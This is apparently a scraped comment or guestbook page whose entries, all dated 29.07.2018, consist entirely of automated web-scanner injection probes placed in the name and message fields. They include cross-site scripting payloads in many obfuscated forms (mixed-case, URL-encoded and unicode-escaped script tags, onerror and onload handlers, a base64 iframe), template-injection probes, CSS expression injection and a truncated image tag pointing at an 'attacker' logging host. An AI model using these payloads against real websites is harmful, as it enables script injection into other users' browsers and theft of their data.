'"()&%V7SM(9294)

Nimi: e

1

29.07.2018, 18:50

e_9011

Nimi: e

1

29.07.2018, 18:50

acu7230<s1﹥s2ʺs3ʹuca7230

Nimi: e

1

29.07.2018, 18:50

{{10000388*10000218}}

Nimi: e

1

29.07.2018, 18:50

eV7SM(9622)

Nimi: e

1

29.07.2018, 18:50

eXHZ0C[!+!]

Nimi: e

1

29.07.2018, 18:50

eV7SM(9142)

Nimi: e

1

29.07.2018, 18:50

eV7SM(9671)

Nimi: e

1

29.07.2018, 18:50

eV7SM(9848)

Nimi: e

1

29.07.2018, 18:50

eV7SM(9507)

Nimi: e

1

29.07.2018, 18:50

%65%3C%53%63%52%69%50%74%20%3E%56%37%53%4D%289580%29%3C%2F%73%43%72%69%70%54%3E

Nimi: e

1

29.07.2018, 18:51

e\u003CScRiPt\V7SM(9832)\u003C/sCripT\u003E

Nimi: e

1

29.07.2018, 18:51

e&lt;ScRiPt&gt;V7SM(9637)&lt;/sCripT&gt;

Nimi: e

1

29.07.2018, 18:51

e}body{acu:Expre/**/SSion(V7SM(9781))}

Nimi: e

1

29.07.2018, 18:51

e_pZfg4 V7SM(9655)

Nimi: e

1

29.07.2018, 18:51

eDF2PU[!+!]

Nimi: e

1

29.07.2018, 18:51

e

Nimi: e

1'"()&%<acx><ScRiPt >V7SM(9970)</ScRiPt>

29.07.2018, 18:59

e

Nimi: e

'"()&%<acx><ScRiPt >V7SM(9893)</ScRiPt>

29.07.2018, 18:59

e

Nimi: e

1_9388

29.07.2018, 18:59

e

Nimi: e

acu7022<s1﹥s2ʺs3ʹuca7022

29.07.2018, 18:59

e

Nimi: e

{{10000034*9999974}}

29.07.2018, 18:59

e

Nimi: e

1<ScRiPt >V7SM(9293)</ScRiPt>

29.07.2018, 18:59

e

Nimi: e

1<WXLPTW>8QLNT[!+!]</WXLPTW>

29.07.2018, 18:59

e

Nimi: e

1<script>V7SM(9219)</script>

29.07.2018, 18:59

e

Nimi: e

1<ScR<ScRiPt>IpT>V7SM(9030)</sCr<ScRiPt>IpT>

29.07.2018, 18:59

e

Nimi: e

1<ScRiPt
>V7SM(9434)</ScRiPt>

29.07.2018, 18:59

e

Nimi: e

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?9321></ScRiPt>

29.07.2018, 18:59

e

Nimi: e

1<video><source onerror="javascript:V7SM(9506)">

29.07.2018, 18:59

e

Nimi: e

1<isindex type=image src=1 onerror=V7SM(9947)>

29.07.2018, 18:59

e

Nimi: e

1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9694'>

29.07.2018, 18:59

e

Nimi: e

1<body onload=V7SM(9039)>

29.07.2018, 18:59

e

Nimi: e

1<img src=//testasp.vulnweb.com/t/dot.gif onload=V7SM(9376)>

29.07.2018, 18:59

e

Nimi: e

1<img src=xyz OnErRor=V7SM(9226)>

29.07.2018, 18:59

e

Nimi: e

1<img/src=">" onerror=alert(9967)>

29.07.2018, 18:59

e

Nimi: e

%31%3C%53%63%52%69%50%74%20%3E%56%37%53%4D%289700%29%3C%2F%73%43%72%69%70%54%3E

29.07.2018, 18:59

e

Nimi: e

1\u003CScRiPt\V7SM(9650)\u003C/sCripT\u003E

29.07.2018, 18:59

e

Nimi: e

1&lt;ScRiPt&gt;V7SM(9853)&lt;/sCripT&gt;

29.07.2018, 18:59

e

Nimi: e

1<input autofocus onfocus=V7SM(9902)>

29.07.2018, 18:59

e

Nimi: e

1<img<!-- --> src=x onerror=alert(9322);//><!-- -->

29.07.2018, 19:00

e

Nimi: e

1}body{acu:Expre/**/SSion(V7SM(9334))}

29.07.2018, 19:00

e

Nimi: e

1<% contenteditable onresize=V7SM(9714)>

29.07.2018, 19:00

e

Nimi: e

1_EmJWQ
<ScRiPt >V7SM(9390)</ScRiPt>

29.07.2018, 19:00

e

Nimi: e

1<WQAN0K>11MVN[!+!]</WQAN0K>

29.07.2018, 19:00

e

Nimi: e

1<ifRAme sRc=9908.com></IfRamE>

29.07.2018, 19:00

e

Nimi: e

1<2wNpXY x=9496>

29.07.2018, 19:00

e

Nimi: e

1<img sRc='http://attacker-9776/log.php?

29.07.2018, 19:00

e

Nimi: e'"()&%V7SM(9210)

1

29.07.2018, 19:00

e

Nimi: '"()&%V7SM(9070)

1

29.07.2018, 19:00

e

Nimi: e_9718

1

29.07.2018, 19:00

e

Nimi: acu6402<s1﹥s2ʺs3ʹuca6402

1

29.07.2018, 19:00

e

Nimi: {{10000236*9999708}}

1

29.07.2018, 19:00

e

Nimi: eV7SM(9830)

1

29.07.2018, 19:00

e

Nimi: eYFHIT[!+!]

1

29.07.2018, 19:00

e

Nimi: eV7SM(9010)

1

29.07.2018, 19:00

e

Nimi: eV7SM(9141)

1

29.07.2018, 19:00

e

Nimi: eV7SM(9210)

1

29.07.2018, 19:00

e

Nimi: eV7SM(9903)

1

29.07.2018, 19:00

e

Nimi: %65%3C%53%63%52%69%50%74%20%3E%56%37%53%4D%289781%29%3C%2F%73%43%72%69%70%54%3E

1

29.07.2018, 19:01

e

Nimi: e\u003CScRiPt\V7SM(9633)\u003C/sCripT\u003E

1

29.07.2018, 19:01

e

Nimi: e&lt;ScRiPt&gt;V7SM(9398)&lt;/sCripT&gt;

1

29.07.2018, 19:01

e

Nimi: e}body{acu:Expre/**/SSion(V7SM(9314))}

1

29.07.2018, 19:01

e

Nimi: e_h6gLj V7SM(9617)

1

29.07.2018, 19:01

e

Nimi: eC4UXU[!+!]

1

29.07.2018, 19:01

e'"()&%V7SM(9098)

Nimi: e

1

29.07.2018, 19:01

'"()&%V7SM(9023)

Nimi: e

1

29.07.2018, 19:01

e_9200

Nimi: e

1

29.07.2018, 19:01

acu5406<s1﹥s2ʺs3ʹuca5406

Nimi: e

1

29.07.2018, 19:01

{{9999044*10000124}}

Nimi: e

1

29.07.2018, 19:01

eV7SM(9973)

Nimi: e

1

29.07.2018, 19:02

e4LHGR[!+!]

Nimi: e

1

29.07.2018, 19:02

eV7SM(9847)

Nimi: e

1

29.07.2018, 19:02

eV7SM(9537)

Nimi: e

1

29.07.2018, 19:02

eV7SM(9279)

Nimi: e

1

29.07.2018, 19:02

eV7SM(9109)

Nimi: e

1

29.07.2018, 19:02

%65%3C%53%63%52%69%50%74%20%3E%56%37%53%4D%289381%29%3C%2F%73%43%72%69%70%54%3E

Nimi: e

1

29.07.2018, 19:02

e\u003CScRiPt\V7SM(9621)\u003C/sCripT\u003E

Nimi: e

1

29.07.2018, 19:02

e&lt;ScRiPt&gt;V7SM(9615)&lt;/sCripT&gt;

Nimi: e

1

29.07.2018, 19:02

e}body{acu:Expre/**/SSion(V7SM(9725))}

Nimi: e

1

29.07.2018, 19:02

e_6xhFp V7SM(9241)

Nimi: e

1

29.07.2018, 19:02

eFBHK4[!+!]

Nimi: e

1

29.07.2018, 19:02

e

Nimi: e

1'"()&%<acx><ScRiPt >V7SM(9815)</ScRiPt>

29.07.2018, 19:03

e

Nimi: e

'"()&%<acx><ScRiPt >V7SM(9427)</ScRiPt>

29.07.2018, 19:03

e

Nimi: e

1_9773

29.07.2018, 19:03

e

Nimi: e

acu7532<s1﹥s2ʺs3ʹuca7532

29.07.2018, 19:03

e

Nimi: e

{{9999272*9999904}}

29.07.2018, 19:03

e

Nimi: e

1<ScRiPt >V7SM(9496)</ScRiPt>

29.07.2018, 19:03

e

Nimi: e

1<WHIPHM>HI0SZ[!+!]</WHIPHM>

29.07.2018, 19:03

e

Nimi: e

1<script>V7SM(9196)</script>

29.07.2018, 19:03

e

Nimi: e

1<ScR<ScRiPt>IpT>V7SM(9913)</sCr<ScRiPt>IpT>

29.07.2018, 19:03

e

Nimi: e

1<ScRiPt
>V7SM(9443)</ScRiPt>

29.07.2018, 19:03

e

Nimi: e

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?9111></ScRiPt>

29.07.2018, 19:03

e

Nimi: e

1<video><source onerror="javascript:V7SM(9891)">

29.07.2018, 19:03

e

Nimi: e

1<isindex type=image src=1 onerror=V7SM(9517)>

29.07.2018, 19:03

e

Nimi: e

1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9836'>

29.07.2018, 19:03

e

Nimi: e

1<body onload=V7SM(9519)>

29.07.2018, 19:03

e

Nimi: e

1<img src=//testasp.vulnweb.com/t/dot.gif onload=V7SM(9881)>

29.07.2018, 19:03

e

Nimi: e

1<img src=xyz OnErRor=V7SM(9393)>

29.07.2018, 19:03

e

Nimi: e

1<img/src=">" onerror=alert(9287)>

29.07.2018, 19:03

e

Nimi: e

%31%3C%53%63%52%69%50%74%20%3E%56%37%53%4D%289994%29%3C%2F%73%43%72%69%70%54%3E

29.07.2018, 19:03

e

Nimi: e

1\u003CScRiPt\V7SM(9735)\u003C/sCripT\u003E

29.07.2018, 19:03

e

Nimi: e

1&lt;ScRiPt&gt;V7SM(9774)&lt;/sCripT&gt;

29.07.2018, 19:04

e

Nimi: e

1<input autofocus onfocus=V7SM(9598)>

29.07.2018, 19:04

e

Nimi: e

1<img<!-- --> src=x onerror=alert(9115);//><!-- -->

29.07.2018, 19:04

e

Nimi: e

1}body{acu:Expre/**/SSion(V7SM(9059))}

29.07.2018, 19:04

e

Nimi: e

1<% contenteditable onresize=V7SM(9797)>

29.07.2018, 19:04

e

Nimi: e

1_xvsD4
<ScRiPt >V7SM(9210)</ScRiPt>

29.07.2018, 19:04

e

Nimi: e

1<WINIPB>6KKNL[!+!]</WINIPB>

29.07.2018, 19:04

e

Nimi: e

1<ifRAme sRc=9425.com></IfRamE>

29.07.2018, 19:04

e

Nimi: e

1<kaim1V x=9126>

29.07.2018, 19:04

e

Nimi: e

1<img sRc='http://attacker-9240/log.php?

29.07.2018, 19:04

e

Nimi: e'"()&%V7SM(9101)

1

29.07.2018, 19:04

e

Nimi: '"()&%V7SM(9268)

1

29.07.2018, 19:04

e

Nimi: e_9367

1

29.07.2018, 19:04

e

Nimi: acu5136<s1﹥s2ʺs3ʹuca5136

1

29.07.2018, 19:04

e

Nimi: {{9999376*9999149}}

1

29.07.2018, 19:04

e

Nimi: eV7SM(9624)

1

29.07.2018, 19:04

e

Nimi: eBU0BW[!+!]

1

29.07.2018, 19:04

e

Nimi: eV7SM(9721)

1

29.07.2018, 19:04

e

Nimi: eV7SM(9731)

1

29.07.2018, 19:04

e

Nimi: eV7SM(9066)

1

29.07.2018, 19:05

e

Nimi: eV7SM(9309)

1

29.07.2018, 19:05

e

Nimi: %65%3C%53%63%52%69%50%74%20%3E%56%37%53%4D%289718%29%3C%2F%73%43%72%69%70%54%3E

1

29.07.2018, 19:05

e

Nimi: e\u003CScRiPt\V7SM(9418)\u003C/sCripT\u003E

1

29.07.2018, 19:05

e

Nimi: e&lt;ScRiPt&gt;V7SM(9721)&lt;/sCripT&gt;

1

29.07.2018, 19:05

e

Nimi: e}body{acu:Expre/**/SSion(V7SM(9177))}

1

29.07.2018, 19:05

e

Nimi: e_WUTrl V7SM(9768)

1

29.07.2018, 19:05

e

Nimi: e6O572[!+!]

1

29.07.2018, 19:05

e'"()&%V7SM(9643)

Nimi: e

1

29.07.2018, 19:06

'"()&%V7SM(9610)

Nimi: e

1

29.07.2018, 19:06

e_9730

Nimi: e

1

29.07.2018, 19:06

acu4508<s1﹥s2ʺs3ʹuca4508

Nimi: e

1

29.07.2018, 19:06

{{9999105*10000496}}

Nimi: e

1

29.07.2018, 19:06

eV7SM(9813)

Nimi: e

1

29.07.2018, 19:06

eYCKRQ[!+!]

Nimi: e

1

29.07.2018, 19:06

eV7SM(9987)

Nimi: e

1

29.07.2018, 19:06

eV7SM(9970)

Nimi: e

1

29.07.2018, 19:06

eV7SM(9320)

Nimi: e

1

29.07.2018, 19:06

eV7SM(9672)

Nimi: e

1

29.07.2018, 19:06

%65%3C%53%63%52%69%50%74%20%3E%56%37%53%4D%289482%29%3C%2F%73%43%72%69%70%54%3E

Nimi: e

1

29.07.2018, 19:07

e\u003CScRiPt\V7SM(9216)\u003C/sCripT\u003E

Nimi: e

1

29.07.2018, 19:07

e&lt;ScRiPt&gt;V7SM(9385)&lt;/sCripT&gt;

Nimi: e

1

29.07.2018, 19:07

e}body{acu:Expre/**/SSion(V7SM(9793))}

Nimi: e

1

29.07.2018, 19:07

e_2OP5I V7SM(9334)

Nimi: e

1

29.07.2018, 19:07

eA2XI1[!+!]

Nimi: e

1

29.07.2018, 19:07